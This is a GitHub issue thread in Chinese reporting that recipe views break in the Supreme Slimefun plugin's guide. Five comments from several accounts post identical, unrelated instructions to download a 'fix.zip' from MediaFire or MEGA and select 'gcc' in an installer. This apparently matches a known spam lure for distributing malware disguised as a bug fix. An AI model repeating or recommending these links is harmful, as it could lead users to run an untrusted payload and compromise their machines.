### ISSUE TITLE
部分卡片在手册中无法查看合成表

### ISSUE THREAD

**Issue by Phi-2X** [SlimefunGuguProject/Supreme#33]
### 检查项目

- [X] 你使用的是从构建站下载的版本
- [X] 你已经检验过下载的文件的校验和，确认已完整下载文件
- [X] 你没有对下载的文件内容进行任何更改
- [X] 你已经寻找过[已知问题列表](https://github.com/SlimefunGuguProject/Supreme/issues)，且没有找到相同的问题

### 问题描述

部分至尊卡片在手册中无法查看合成表，产生如下报错后手册无法再打开，退出重进后手册可打开但问题复现。
包括手册中从铁粉卡片开始往后所有卡片。

### 复现步骤

1.使用paper-1.21-117开服并安装slimefun,guizhanlib,supreme插件
2.打开手册查看铁粉卡片或之后卡片

### 预期行为

卡片能查看合成表

### 服务器日志

https://paste.guizhanss.net/8vcqt

### 服务端软件

Paper

### Minecraft 版本

1.21

### Slimefun版本

![image](https://github.com/user-attachments/assets/d372f779-2e75-4881-9716-dfd8a01c6f69)

### 插件版本

Build 20 (git b586557)

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by ybw0014** [comment]
没有完全检查过，可能其他地方还会遇到
